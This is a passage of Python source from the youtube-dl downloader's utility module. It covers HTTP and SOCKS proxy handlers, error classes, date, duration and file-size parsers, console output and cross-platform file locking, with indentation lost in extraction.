context.set_default_verify_paths()
return YoutubeDLHTTPSHandler(params, context=context, **kwargs)
def bug_reports_message():
if ytdl_is_updateable():
update_cmd = 'type youtube-dl -U to update'
else:
update_cmd = 'see https://yt-dl.org/update on how to update'
msg = '; please report this issue on https://yt-dl.org/bug .'
msg += ' Make sure you are using the latest version; %s.' % update_cmd
msg += ' Be sure to call youtube-dl with the --verbose flag and include its complete output.'
return msg
class ExtractorError(Exception):
"""Error during info extraction."""
def __init__(self, msg, tb=None, expected=False, cause=None, video_id=None):
""" tb, if given, is the original traceback (so that it can be printed out).
If expected is set, this is a normal error message and most likely not a bug in youtube-dl.
"""
if sys.exc_info()[0] in (compat_urllib_error.URLError, socket.timeout, UnavailableVideoError):
expected = True
if video_id is not None:
msg = video_id + ': ' + msg
if cause:
msg += ' (caused by %r)' % cause
if not expected:
msg += bug_reports_message()
super(ExtractorError, self).__init__(msg)
self.traceback = tb
self.exc_info = sys.exc_info() # preserve original exception
self.cause = cause
self.video_id = video_id
def format_traceback(self):
if self.traceback is None:
return None
return ''.join(traceback.format_tb(self.traceback))
class UnsupportedError(ExtractorError):
def __init__(self, url):
super(UnsupportedError, self).__init__(
'Unsupported URL: %s' % url, expected=True)
self.url = url
class RegexNotFoundError(ExtractorError):
"""Error when a regex didn't match"""
pass
class DownloadError(Exception):
"""Download Error exception.
This exception may be thrown by FileDownloader objects if they are not
configured to continue on errors. They will contain the appropriate
error message.
"""
def __init__(self, msg, exc_info=None):
""" exc_info, if given, is the original exception that caused the trouble (as returned by sys.exc_info()). """
super(DownloadError, self).__init__(msg)
self.exc_info = exc_info
class SameFileError(Exception):
"""Same File exception.
This exception will be thrown by FileDownloader objects if they detect
multiple files would have to be downloaded to the same file on disk.
"""
pass
class PostProcessingError(Exception):
"""Post Processing exception.
This exception may be raised by PostProcessor's .run() method to
indicate an error in the postprocessing task.
"""
def __init__(self, msg):
self.msg = msg
class MaxDownloadsReached(Exception):
""" --max-downloads limit has been reached. """
pass
class UnavailableVideoError(Exception):
"""Unavailable Format exception.
This exception will be thrown when a video is requested
in a format that is not available for that video.
"""
pass
class ContentTooShortError(Exception):
"""Content Too Short exception.
This exception may be raised by FileDownloader objects when a file they
download is too small for what the server announced first, indicating
the connection was probably interrupted.
"""
def __init__(self, downloaded, expected):
# Both in bytes
self.downloaded = downloaded
self.expected = expected
def _create_http_connection(ydl_handler, http_class, is_https, *args, **kwargs):
# Working around python 2 bug (see http://bugs.python.org/issue17849) by limiting
# expected HTTP responses to meet HTTP/1.0 or later (see also
# https://github.com/rg3/youtube-dl/issues/6727)
if sys.version_info < (3, 0):
kwargs[b'strict'] = True
hc = http_class(*args, **kwargs)
source_address = ydl_handler._params.get('source_address')
if source_address is not None:
sa = (source_address, 0)
if hasattr(hc, 'source_address'): # Python 2.7+
hc.source_address = sa
else: # Python 2.6
def _hc_connect(self, *args, **kwargs):
sock = compat_socket_create_connection(
(self.host, self.port), self.timeout, sa)
if is_https:
self.sock = ssl.wrap_socket(
sock, self.key_file, self.cert_file,
ssl_version=ssl.PROTOCOL_TLSv1)
else:
self.sock = sock
hc.connect = functools.partial(_hc_connect, hc)
return hc
def handle_youtubedl_headers(headers):
filtered_headers = headers
if 'Youtubedl-no-compression' in filtered_headers:
filtered_headers = dict((k, v) for k, v in filtered_headers.items() if k.lower() != 'accept-encoding')
del filtered_headers['Youtubedl-no-compression']
return filtered_headers
class YoutubeDLHandler(compat_urllib_request.HTTPHandler):
"""Handler for HTTP requests and responses.
This class, when installed with an OpenerDirector, automatically adds
the standard headers to every HTTP request and handles gzipped and
deflated responses from web servers. If compression is to be avoided in
a particular request, the original request in the program code only has
to include the HTTP header "Youtubedl-no-compression", which will be
removed before making the real request.
Part of this code was copied from:
http://techknack.net/python-urllib2-handlers/
Andrew Rowls, the author of that code, agreed to release it to the
public domain.
"""
def __init__(self, params, *args, **kwargs):
compat_urllib_request.HTTPHandler.__init__(self, *args, **kwargs)
self._params = params
def http_open(self, req):
conn_class = compat_http_client.HTTPConnection
socks_proxy = req.headers.get('Ytdl-socks-proxy')
if socks_proxy:
conn_class = make_socks_conn_class(conn_class, socks_proxy)
del req.headers['Ytdl-socks-proxy']
return self.do_open(functools.partial(
_create_http_connection, self, conn_class, False),
req)
@staticmethod
def deflate(data):
try:
return zlib.decompress(data, -zlib.MAX_WBITS)
except zlib.error:
return zlib.decompress(data)
@staticmethod
def addinfourl_wrapper(stream, headers, url, code):
if hasattr(compat_urllib_request.addinfourl, 'getcode'):
return compat_urllib_request.addinfourl(stream, headers, url, code)
ret = compat_urllib_request.addinfourl(stream, headers, url)
ret.code = code
return ret
def http_request(self, req):
# According to RFC 3986, URLs can not contain non-ASCII characters, however this is not
# always respected by websites, some tend to give out URLs with non percent-encoded
# non-ASCII characters (see telemb.py, ard.py [#3412])
# urllib chokes on URLs with non-ASCII characters (see http://bugs.python.org/issue3991)
# To work around aforementioned issue we will replace request's original URL with
# percent-encoded one
# Since redirects are also affected (e.g. http://www.southpark.de/alle-episoden/s18e09)
# the code of this workaround has been moved here from YoutubeDL.urlopen()
url = req.get_full_url()
url_escaped = escape_url(url)
# Substitute URL if any change after escaping
if url != url_escaped:
req = update_Request(req, url=url_escaped)
for h, v in std_headers.items():
# Capitalize is needed because of Python bug 2275: http://bugs.python.org/issue2275
# The dict keys are capitalized because of this bug by urllib
if h.capitalize() not in req.headers:
req.add_header(h, v)
req.headers = handle_youtubedl_headers(req.headers)
if sys.version_info < (2, 7) and '#' in req.get_full_url():
# Python 2.6 is brain-dead when it comes to fragments
req._Request__original = req._Request__original.partition('#')[0]
req._Request__r_type = req._Request__r_type.partition('#')[0]
return req
def http_response(self, req, resp):
old_resp = resp
# gzip
if resp.headers.get('Content-encoding', '') == 'gzip':
content = resp.read()
gz = gzip.GzipFile(fileobj=io.BytesIO(content), mode='rb')
try:
uncompressed = io.BytesIO(gz.read())
except IOError as original_ioerror:
                # There may be junk at the end of the file
# See http://stackoverflow.com/q/4928560/35070 for details
for i in range(1, 1024):
try:
gz = gzip.GzipFile(fileobj=io.BytesIO(content[:-i]), mode='rb')
uncompressed = io.BytesIO(gz.read())
except IOError:
continue
break
else:
raise original_ioerror
resp = self.addinfourl_wrapper(uncompressed, old_resp.headers, old_resp.url, old_resp.code)
resp.msg = old_resp.msg
del resp.headers['Content-encoding']
# deflate
if resp.headers.get('Content-encoding', '') == 'deflate':
gz = io.BytesIO(self.deflate(resp.read()))
resp = self.addinfourl_wrapper(gz, old_resp.headers, old_resp.url, old_resp.code)
resp.msg = old_resp.msg
del resp.headers['Content-encoding']
# Percent-encode redirect URL of Location HTTP header to satisfy RFC 3986 (see
# https://github.com/rg3/youtube-dl/issues/6457).
if 300 <= resp.code < 400:
location = resp.headers.get('Location')
if location:
# As of RFC 2616 default charset is iso-8859-1 that is respected by python 3
if sys.version_info >= (3, 0):
location = location.encode('iso-8859-1').decode('utf-8')
else:
location = location.decode('utf-8')
location_escaped = escape_url(location)
if location != location_escaped:
del resp.headers['Location']
if sys.version_info < (3, 0):
location_escaped = location_escaped.encode('utf-8')
resp.headers['Location'] = location_escaped
return resp
https_request = http_request
https_response = http_response
def make_socks_conn_class(base_class, socks_proxy):
assert issubclass(base_class, (
compat_http_client.HTTPConnection, compat_http_client.HTTPSConnection))
url_components = compat_urlparse.urlparse(socks_proxy)
if url_components.scheme.lower() == 'socks5':
socks_type = ProxyType.SOCKS5
elif url_components.scheme.lower() in ('socks', 'socks4'):
socks_type = ProxyType.SOCKS4
elif url_components.scheme.lower() == 'socks4a':
socks_type = ProxyType.SOCKS4A
def unquote_if_non_empty(s):
if not s:
return s
return compat_urllib_parse_unquote_plus(s)
proxy_args = (
socks_type,
url_components.hostname, url_components.port or 1080,
True, # Remote DNS
unquote_if_non_empty(url_components.username),
unquote_if_non_empty(url_components.password),
)
class SocksConnection(base_class):
def connect(self):
self.sock = sockssocket()
self.sock.setproxy(*proxy_args)
if type(self.timeout) in (int, float):
self.sock.settimeout(self.timeout)
self.sock.connect((self.host, self.port))
if isinstance(self, compat_http_client.HTTPSConnection):
if hasattr(self, '_context'): # Python > 2.6
self.sock = self._context.wrap_socket(
self.sock, server_hostname=self.host)
else:
self.sock = ssl.wrap_socket(self.sock)
return SocksConnection
class YoutubeDLHTTPSHandler(compat_urllib_request.HTTPSHandler):
def __init__(self, params, https_conn_class=None, *args, **kwargs):
compat_urllib_request.HTTPSHandler.__init__(self, *args, **kwargs)
self._https_conn_class = https_conn_class or compat_http_client.HTTPSConnection
self._params = params
def https_open(self, req):
kwargs = {}
conn_class = self._https_conn_class
if hasattr(self, '_context'): # python > 2.6
kwargs['context'] = self._context
if hasattr(self, '_check_hostname'): # python 3.x
kwargs['check_hostname'] = self._check_hostname
socks_proxy = req.headers.get('Ytdl-socks-proxy')
if socks_proxy:
conn_class = make_socks_conn_class(conn_class, socks_proxy)
del req.headers['Ytdl-socks-proxy']
return self.do_open(functools.partial(
_create_http_connection, self, conn_class, True),
req, **kwargs)
class YoutubeDLCookieProcessor(compat_urllib_request.HTTPCookieProcessor):
def __init__(self, cookiejar=None):
compat_urllib_request.HTTPCookieProcessor.__init__(self, cookiejar)
def http_response(self, request, response):
# Python 2 will choke on next HTTP request in row if there are non-ASCII
# characters in Set-Cookie HTTP header of last response (see
# https://github.com/rg3/youtube-dl/issues/6769).
# In order to at least prevent crashing we will percent encode Set-Cookie
# header before HTTPCookieProcessor starts processing it.
# if sys.version_info < (3, 0) and response.headers:
# for set_cookie_header in ('Set-Cookie', 'Set-Cookie2'):
# set_cookie = response.headers.get(set_cookie_header)
# if set_cookie:
# set_cookie_escaped = compat_urllib_parse.quote(set_cookie, b"%/;:@&=+$,!~*'()?#[] ")
# if set_cookie != set_cookie_escaped:
# del response.headers[set_cookie_header]
# response.headers[set_cookie_header] = set_cookie_escaped
return compat_urllib_request.HTTPCookieProcessor.http_response(self, request, response)
https_request = compat_urllib_request.HTTPCookieProcessor.http_request
https_response = http_response
def extract_timezone(date_str):
m = re.search(
r'^.{8,}?(?P<tz>Z$| ?(?P<sign>\+|-)(?P<hours>[0-9]{2}):?(?P<minutes>[0-9]{2})$)',
date_str)
if not m:
timezone = datetime.timedelta()
else:
date_str = date_str[:-len(m.group('tz'))]
if not m.group('sign'):
timezone = datetime.timedelta()
else:
sign = 1 if m.group('sign') == '+' else -1
timezone = datetime.timedelta(
hours=sign * int(m.group('hours')),
minutes=sign * int(m.group('minutes')))
return timezone, date_str
def parse_iso8601(date_str, delimiter='T', timezone=None):
""" Return a UNIX timestamp from the given date """
if date_str is None:
return None
date_str = re.sub(r'\.[0-9]+', '', date_str)
if timezone is None:
timezone, date_str = extract_timezone(date_str)
try:
date_format = '%Y-%m-%d{0}%H:%M:%S'.format(delimiter)
dt = datetime.datetime.strptime(date_str, date_format) - timezone
return calendar.timegm(dt.timetuple())
except ValueError:
pass
def date_formats(day_first=True):
return DATE_FORMATS_DAY_FIRST if day_first else DATE_FORMATS_MONTH_FIRST
def unified_strdate(date_str, day_first=True):
"""Return a string with the date in the format YYYYMMDD"""
if date_str is None:
return None
upload_date = None
# Replace commas
date_str = date_str.replace(',', ' ')
# Remove AM/PM + timezone
date_str = re.sub(r'(?i)\s*(?:AM|PM)(?:\s+[A-Z]+)?', '', date_str)
_, date_str = extract_timezone(date_str)
for expression in date_formats(day_first):
try:
upload_date = datetime.datetime.strptime(date_str, expression).strftime('%Y%m%d')
except ValueError:
pass
if upload_date is None:
timetuple = email.utils.parsedate_tz(date_str)
if timetuple:
try:
upload_date = datetime.datetime(*timetuple[:6]).strftime('%Y%m%d')
except ValueError:
pass
if upload_date is not None:
return compat_str(upload_date)
def unified_timestamp(date_str, day_first=True):
if date_str is None:
return None
date_str = date_str.replace(',', ' ')
pm_delta = datetime.timedelta(hours=12 if re.search(r'(?i)PM', date_str) else 0)
timezone, date_str = extract_timezone(date_str)
# Remove AM/PM + timezone
date_str = re.sub(r'(?i)\s*(?:AM|PM)(?:\s+[A-Z]+)?', '', date_str)
for expression in date_formats(day_first):
try:
dt = datetime.datetime.strptime(date_str, expression) - timezone + pm_delta
return calendar.timegm(dt.timetuple())
except ValueError:
pass
timetuple = email.utils.parsedate_tz(date_str)
if timetuple:
return calendar.timegm(timetuple.timetuple())
def determine_ext(url, default_ext='unknown_video'):
if url is None:
return default_ext
guess = url.partition('?')[0].rpartition('.')[2]
if re.match(r'^[A-Za-z0-9]+$', guess):
return guess
# Try extract ext from URLs like http://example.com/foo/bar.mp4/?download
elif guess.rstrip('/') in KNOWN_EXTENSIONS:
return guess.rstrip('/')
else:
return default_ext
def subtitles_filename(filename, sub_lang, sub_format):
return filename.rsplit('.', 1)[0] + '.' + sub_lang + '.' + sub_format
def date_from_str(date_str):
"""
Return a datetime object from a string in the format YYYYMMDD or
(now|today)[+-][0-9](day|week|month|year)(s)?"""
today = datetime.date.today()
if date_str in ('now', 'today'):
return today
if date_str == 'yesterday':
return today - datetime.timedelta(days=1)
match = re.match('(now|today)(?P<sign>[+-])(?P<time>\d+)(?P<unit>day|week|month|year)(s)?', date_str)
if match is not None:
sign = match.group('sign')
time = int(match.group('time'))
if sign == '-':
time = -time
unit = match.group('unit')
# A bad approximation?
if unit == 'month':
unit = 'day'
time *= 30
elif unit == 'year':
unit = 'day'
time *= 365
unit += 's'
delta = datetime.timedelta(**{unit: time})
return today + delta
return datetime.datetime.strptime(date_str, '%Y%m%d').date()
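# For example (illustrative): date_from_str('now-1week') is seven days before
# today, and date_from_str('20160101') is datetime.date(2016, 1, 1).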
def hyphenate_date(date_str):
"""
Convert a date in 'YYYYMMDD' format to 'YYYY-MM-DD' format"""
match = re.match(r'^(\d\d\d\d)(\d\d)(\d\d)$', date_str)
if match is not None:
return '-'.join(match.groups())
else:
return date_str
class DateRange(object):
"""Represents a time interval between two dates"""
def __init__(self, start=None, end=None):
"""start and end must be strings in the format accepted by date"""
if start is not None:
self.start = date_from_str(start)
else:
self.start = datetime.datetime.min.date()
if end is not None:
self.end = date_from_str(end)
else:
self.end = datetime.datetime.max.date()
if self.start > self.end:
            raise ValueError('Date range: "%s", the start date must be before the end date' % self)
@classmethod
def day(cls, day):
"""Returns a range that only contains the given day"""
return cls(day, day)
def __contains__(self, date):
"""Check if the date is in the range"""
if not isinstance(date, datetime.date):
date = date_from_str(date)
return self.start <= date <= self.end
def __str__(self):
return '%s - %s' % (self.start.isoformat(), self.end.isoformat())
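# Illustrative: '20160315' in DateRange('20160101', '20160630') evaluates to True,
# since strings are converted with date_from_str() before the comparison.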
def platform_name():
""" Returns the platform name as a compat_str """
res = platform.platform()
if isinstance(res, bytes):
res = res.decode(preferredencoding())
assert isinstance(res, compat_str)
return res
def _windows_write_string(s, out):
""" Returns True if the string was written using special methods,
False if it has yet to be written out."""
# Adapted from http://stackoverflow.com/a/3259271/35070
import ctypes
import ctypes.wintypes
WIN_OUTPUT_IDS = {
1: -11,
2: -12,
}
try:
fileno = out.fileno()
except AttributeError:
# If the output stream doesn't have a fileno, it's virtual
return False
except io.UnsupportedOperation:
# Some strange Windows pseudo files?
return False
if fileno not in WIN_OUTPUT_IDS:
return False
GetStdHandle = ctypes.WINFUNCTYPE(
ctypes.wintypes.HANDLE, ctypes.wintypes.DWORD)(
(b'GetStdHandle', ctypes.windll.kernel32))
h = GetStdHandle(WIN_OUTPUT_IDS[fileno])
WriteConsoleW = ctypes.WINFUNCTYPE(
ctypes.wintypes.BOOL, ctypes.wintypes.HANDLE, ctypes.wintypes.LPWSTR,
ctypes.wintypes.DWORD, ctypes.POINTER(ctypes.wintypes.DWORD),
ctypes.wintypes.LPVOID)((b'WriteConsoleW', ctypes.windll.kernel32))
written = ctypes.wintypes.DWORD(0)
GetFileType = ctypes.WINFUNCTYPE(ctypes.wintypes.DWORD, ctypes.wintypes.DWORD)((b'GetFileType', ctypes.windll.kernel32))
FILE_TYPE_CHAR = 0x0002
FILE_TYPE_REMOTE = 0x8000
GetConsoleMode = ctypes.WINFUNCTYPE(
ctypes.wintypes.BOOL, ctypes.wintypes.HANDLE,
ctypes.POINTER(ctypes.wintypes.DWORD))(
(b'GetConsoleMode', ctypes.windll.kernel32))
INVALID_HANDLE_VALUE = ctypes.wintypes.DWORD(-1).value
def not_a_console(handle):
if handle == INVALID_HANDLE_VALUE or handle is None:
return True
return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR or
GetConsoleMode(handle, ctypes.byref(ctypes.wintypes.DWORD())) == 0)
if not_a_console(h):
return False
def next_nonbmp_pos(s):
try:
return next(i for i, c in enumerate(s) if ord(c) > 0xffff)
except StopIteration:
return len(s)
while s:
count = min(next_nonbmp_pos(s), 1024)
ret = WriteConsoleW(
h, s, count if count else 2, ctypes.byref(written), None)
if ret == 0:
raise OSError('Failed to write string')
if not count: # We just wrote a non-BMP character
assert written.value == 2
s = s[1:]
else:
assert written.value > 0
s = s[written.value:]
return True
def write_string(s, out=None, encoding=None):
if out is None:
out = sys.stderr
assert type(s) == compat_str
if sys.platform == 'win32' and encoding is None and hasattr(out, 'fileno'):
if _windows_write_string(s, out):
return
if ('b' in getattr(out, 'mode', '') or
sys.version_info[0] < 3): # Python 2 lies about mode of sys.stderr
byt = s.encode(encoding or preferredencoding(), 'ignore')
out.write(byt)
elif hasattr(out, 'buffer'):
enc = encoding or getattr(out, 'encoding', None) or preferredencoding()
byt = s.encode(enc, 'ignore')
out.buffer.write(byt)
else:
out.write(s)
out.flush()
def bytes_to_intlist(bs):
if not bs:
return []
if isinstance(bs[0], int): # Python 3
return list(bs)
else:
return [ord(c) for c in bs]
def intlist_to_bytes(xs):
if not xs:
return b''
return compat_struct_pack('%dB' % len(xs), *xs)
# Cross-platform file locking
if sys.platform == 'win32':
import ctypes.wintypes
import msvcrt
class OVERLAPPED(ctypes.Structure):
_fields_ = [
('Internal', ctypes.wintypes.LPVOID),
('InternalHigh', ctypes.wintypes.LPVOID),
('Offset', ctypes.wintypes.DWORD),
('OffsetHigh', ctypes.wintypes.DWORD),
('hEvent', ctypes.wintypes.HANDLE),
]
kernel32 = ctypes.windll.kernel32
LockFileEx = kernel32.LockFileEx
LockFileEx.argtypes = [
ctypes.wintypes.HANDLE, # hFile
ctypes.wintypes.DWORD, # dwFlags
ctypes.wintypes.DWORD, # dwReserved
ctypes.wintypes.DWORD, # nNumberOfBytesToLockLow
ctypes.wintypes.DWORD, # nNumberOfBytesToLockHigh
ctypes.POINTER(OVERLAPPED) # Overlapped
]
LockFileEx.restype = ctypes.wintypes.BOOL
UnlockFileEx = kernel32.UnlockFileEx
UnlockFileEx.argtypes = [
ctypes.wintypes.HANDLE, # hFile
ctypes.wintypes.DWORD, # dwReserved
ctypes.wintypes.DWORD, # nNumberOfBytesToLockLow
ctypes.wintypes.DWORD, # nNumberOfBytesToLockHigh
ctypes.POINTER(OVERLAPPED) # Overlapped
]
UnlockFileEx.restype = ctypes.wintypes.BOOL
whole_low = 0xffffffff
whole_high = 0x7fffffff
def _lock_file(f, exclusive):
overlapped = OVERLAPPED()
overlapped.Offset = 0
overlapped.OffsetHigh = 0
overlapped.hEvent = 0
f._lock_file_overlapped_p = ctypes.pointer(overlapped)
handle = msvcrt.get_osfhandle(f.fileno())
if not LockFileEx(handle, 0x2 if exclusive else 0x0, 0,
whole_low, whole_high, f._lock_file_overlapped_p):
raise OSError('Locking file failed: %r' % ctypes.FormatError())
def _unlock_file(f):
assert f._lock_file_overlapped_p
handle = msvcrt.get_osfhandle(f.fileno())
if not UnlockFileEx(handle, 0,
whole_low, whole_high, f._lock_file_overlapped_p):
raise OSError('Unlocking file failed: %r' % ctypes.FormatError())
else:
    # Some platforms, such as Jython, are missing fcntl
try:
import fcntl
def _lock_file(f, exclusive):
fcntl.flock(f, fcntl.LOCK_EX if exclusive else fcntl.LOCK_SH)
def _unlock_file(f):
fcntl.flock(f, fcntl.LOCK_UN)
except ImportError:
UNSUPPORTED_MSG = 'file locking is not supported on this platform'
def _lock_file(f, exclusive):
raise IOError(UNSUPPORTED_MSG)
def _unlock_file(f):
raise IOError(UNSUPPORTED_MSG)
class locked_file(object):
def __init__(self, filename, mode, encoding=None):
assert mode in ['r', 'a', 'w']
self.f = io.open(filename, mode, encoding=encoding)
self.mode = mode
def __enter__(self):
exclusive = self.mode != 'r'
try:
_lock_file(self.f, exclusive)
except IOError:
self.f.close()
raise
return self
def __exit__(self, etype, value, traceback):
try:
_unlock_file(self.f)
finally:
self.f.close()
def __iter__(self):
return iter(self.f)
def write(self, *args):
return self.f.write(*args)
def read(self, *args):
return self.f.read(*args)
def get_filesystem_encoding():
encoding = sys.getfilesystemencoding()
return encoding if encoding is not None else 'utf-8'
def shell_quote(args):
quoted_args = []
encoding = get_filesystem_encoding()
for a in args:
if isinstance(a, bytes):
# We may get a filename encoded with 'encodeFilename'
a = a.decode(encoding)
quoted_args.append(pipes.quote(a))
return ' '.join(quoted_args)
def smuggle_url(url, data):
""" Pass additional data in a URL for internal use. """
url, idata = unsmuggle_url(url, {})
data.update(idata)
sdata = compat_urllib_parse_urlencode(
{'__youtubedl_smuggle': json.dumps(data)})
return url + '#' + sdata
def unsmuggle_url(smug_url, default=None):
if '#__youtubedl_smuggle' not in smug_url:
return smug_url, default
url, _, sdata = smug_url.rpartition('#')
jsond = compat_parse_qs(sdata)['__youtubedl_smuggle'][0]
data = json.loads(jsond)
return url, data
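# Editor's note: a minimal usage sketch for smuggle_url()/unsmuggle_url()
# (illustrative only, not part of the original module; the example URL is
# hypothetical). The extra data survives a round trip through the URL fragment:
#   >>> u = smuggle_url('http://example.com/video', {'source': 'test'})
#   >>> unsmuggle_url(u)[0]
#   'http://example.com/video'
#   >>> unsmuggle_url(u)[1] == {'source': 'test'}
#   True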
def format_bytes(bytes):
if bytes is None:
return 'N/A'
if type(bytes) is str:
bytes = float(bytes)
if bytes == 0.0:
exponent = 0
else:
exponent = int(math.log(bytes, 1024.0))
suffix = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB'][exponent]
converted = float(bytes) / float(1024 ** exponent)
return '%.2f%s' % (converted, suffix)
def lookup_unit_table(unit_table, s):
units_re = '|'.join(re.escape(u) for u in unit_table)
m = re.match(
r'(?P<num>[0-9]+(?:[,.][0-9]*)?)\s*(?P<unit>%s)\b' % units_re, s)
if not m:
return None
num_str = m.group('num').replace(',', '.')
mult = unit_table[m.group('unit')]
return int(float(num_str) * mult)
def parse_filesize(s):
if s is None:
return None
# The lower-case forms are of course incorrect and unofficial,
# but we support those too
_UNIT_TABLE = {
'B': 1,
'b': 1,
'KiB': 1024,
'KB': 1000,
'kB': 1024,
'Kb': 1000,
'MiB': 1024 ** 2,
'MB': 1000 ** 2,
'mB': 1024 ** 2,
'Mb': 1000 ** 2,
'GiB': 1024 ** 3,
'GB': 1000 ** 3,
'gB': 1024 ** 3,
'Gb': 1000 ** 3,
'TiB': 1024 ** 4,
'TB': 1000 ** 4,
'tB': 1024 ** 4,
'Tb': 1000 ** 4,
'PiB': 1024 ** 5,
'PB': 1000 ** 5,
'pB': 1024 ** 5,
'Pb': 1000 ** 5,
'EiB': 1024 ** 6,
'EB': 1000 ** 6,
'eB': 1024 ** 6,
'Eb': 1000 ** 6,
'ZiB': 1024 ** 7,
'ZB': 1000 ** 7,
'zB': 1024 ** 7,
'Zb': 1000 ** 7,
'YiB': 1024 ** 8,
'YB': 1000 ** 8,
'yB': 1024 ** 8,
'Yb': 1000 ** 8,
}
return lookup_unit_table(_UNIT_TABLE, s)
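# Editor's note: an illustrative sketch of parse_filesize() behaviour (not part
# of the original module). Binary suffixes use powers of 1024, decimal ones 1000:
#   >>> parse_filesize('1.5GiB')
#   1610612736
#   >>> parse_filesize('10 MB')
#   10000000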
def parse_count(s):
if s is None:
return None
s = s.strip()
if re.match(r'^[\d,.]+$', s):
return str_to_int(s)
_UNIT_TABLE = {
'k': 1000,
'K': 1000,
'm': 1000 ** 2,
'M': 1000 ** 2,
'kk': 1000 ** 2,
'KK': 1000 ** 2,
}
return lookup_unit_table(_UNIT_TABLE, s)
def month_by_name(name):
""" Return the number of a month by (locale-independently) English name """
try:
return ENGLISH_MONTH_NAMES.index(name) + 1
except ValueError:
return None
def month_by_abbreviation(abbrev):
""" Return the number of a month by (locale-independently) English
abbreviations """
try:
return [s[:3] for s in ENGLISH_MONTH_NAMES].index(abbrev) + 1
except ValueError:
return None
def fix_xml_ampersands(xml_str):
"""Replace all the '&' by '&' in XML"""
return re.sub(
r'&(?!amp;|lt;|gt;|apos;|quot;|#x[0-9a-fA-F]{,4};|#[0-9]{,4};)',
'&amp;',
xml_str)
def setproctitle(title):
assert isinstance(title, compat_str)
# ctypes in Jython is not complete
# http://bugs.jython.org/issue2148
if sys.platform.startswith('java'):
return
try:
libc = ctypes.cdll.LoadLibrary('libc.so.6')
except OSError:
return
title_bytes = title.encode('utf-8')
buf = ctypes.create_string_buffer(len(title_bytes))
buf.value = title_bytes
try:
libc.prctl(15, buf, 0, 0, 0)
except AttributeError:
return # Strange libc, just skip this
def remove_start(s, start):
return s[len(start):] if s is not None and s.startswith(start) else s
def remove_end(s, end):
return s[:-len(end)] if s is not None and s.endswith(end) else s
def remove_quotes(s):
if s is None or len(s) < 2:
return s
for quote in ('"', "'", ):
if s[0] == quote and s[-1] == quote:
return s[1:-1]
return s
def url_basename(url):
path = compat_urlparse.urlparse(url).path
return path.strip('/').split('/')[-1]
class HEADRequest(compat_urllib_request.Request):
def get_method(self):
return 'HEAD'
class PUTRequest(compat_urllib_request.Request):
def get_method(self):
return 'PUT'
def int_or_none(v, scale=1, default=None, get_attr=None, invscale=1):
if get_attr:
if v is not None:
v = getattr(v, get_attr, None)
if v == '':
v = None
if v is None:
return default
try:
return int(v) * invscale // scale
except ValueError:
return default
def str_or_none(v, default=None):
return default if v is None else compat_str(v)
def str_to_int(int_str):
""" A more relaxed version of int_or_none """
if int_str is None:
return None
int_str = re.sub(r'[,\.\+]', '', int_str)
return int(int_str)
def float_or_none(v, scale=1, invscale=1, default=None):
if v is None:
return default
try:
return float(v) * invscale / scale
except ValueError:
return default
def strip_or_none(v):
return None if v is None else v.strip()
def parse_duration(s):
if not isinstance(s, compat_basestring):
return None
s = s.strip()
days, hours, mins, secs, ms = [None] * 5
m = re.match(r'(?:(?:(?:(?P<days>[0-9]+):)?(?P<hours>[0-9]+):)?(?P<mins>[0-9]+):)?(?P<secs>[0-9]+)(?P<ms>\.[0-9]+)?$', s)
if m:
days, hours, mins, secs, ms = m.groups()
else:
m = re.match(
r'''(?ix)(?:P?T)?
(?:
(?P<days>[0-9]+)\s*d(?:ays?)?\s*
)?
(?:
(?P<hours>[0-9]+)\s*h(?:ours?)?\s*
)?
(?:
(?P<mins>[0-9]+)\s*m(?:in(?:ute)?s?)?\s*
)?
(?:
(?P<secs>[0-9]+)(?P<ms>\.[0-9]+)?\s*s(?:ec(?:ond)?s?)?\s*
)?$''', s)
if m:
days, hours, mins, secs, ms = m.groups()
else:
m = re.match(r'(?i)(?:(?P<hours>[0-9.]+)\s*(?:hours?)|(?P<mins>[0-9.]+)\s*(?:mins?\.?|minutes?)\s*)$', s)
if m:
hours, mins = m.groups()
else:
return None
duration = 0
if secs:
duration += float(secs)
if mins:
duration += float(mins) * 60
if hours:
duration += float(hours) * 60 * 60
if days:
duration += float(days) * 24 * 60 * 60
if ms:
duration += float(ms)
return duration
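# Editor's note: an illustrative sketch of the duration formats accepted above
# (not part of the original module):
#   >>> parse_duration('1:30')        # mm:ss
#   90.0
#   >>> parse_duration('01:02:03')    # hh:mm:ss
#   3723.0
#   >>> parse_duration('PT1H30M')     # ISO 8601 style
#   5400.0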
def prepend_extension(filename, ext, expected_real_ext=None):
name, real_ext = os.path.splitext(filename)
return (
'{0}.{1}{2}'.format(name, ext, real_ext)
if not expected_real_ext or real_ext[1:] == expected_real_ext
else '{0}.{1}'.format(filename, ext))
def replace_extension(filename, ext, expected_real_ext=None):
name, real_ext = os.path.splitext(filename)
return '{0}.{1}'.format(
name if not expected_real_ext or real_ext[1:] == expected_real_ext else filename,
ext)
def check_executable(exe, args=[]):
""" Checks if the given binary is installed somewhere in PATH, and returns its name.
args can be a list of arguments for a short output (like -version) """
try:
subprocess.Popen([exe] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
except OSError:
return False
return exe
def get_exe_version(exe, args=['--version'],
version_re=None, unrecognized='present'):
""" Returns the version of the specified executable,
or False if the executable is not present """
try:
out, _ = subprocess.Popen(
[encodeArgument(exe)] + args,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()
except OSError:
return False
if isinstance(out, bytes): # Python 2.x
out = out.decode('ascii', 'ignore')
return detect_exe_version(out, version_re, unrecognized)
def detect_exe_version(output, version_re=None, unrecognized='present'):
assert isinstance(output, compat_str)
if version_re is None:
version_re = r'version\s+([-0-9._a-zA-Z]+)'
m = re.search(version_re, output)
if m:
return m.group(1)
else:
return unrecognized
class PagedList(object):
def __len__(self):
# This is only useful for tests
return len(self.getslice())
class OnDemandPagedList(PagedList):
def __init__(self, pagefunc, pagesize, use_cache=False):
self._pagefunc = pagefunc
self._pagesize = pagesize
self._use_cache = use_cache
if use_cache:
self._cache = {}
def getslice(self, start=0, end=None):
res = []
for pagenum in itertools.count(start // self._pagesize):
firstid = pagenum * self._pagesize
nextfirstid = pagenum * self._pagesize + self._pagesize
if start >= nextfirstid:
continue
page_results = None
if self._use_cache:
page_results = self._cache.get(pagenum)
if page_results is None:
page_results = list(self._pagefunc(pagenum))
if self._use_cache:
self._cache[pagenum] = page_results
startv = (
start % self._pagesize
if firstid <= start < nextfirstid
else 0)
endv = (
((end - 1) % self._pagesize) + 1
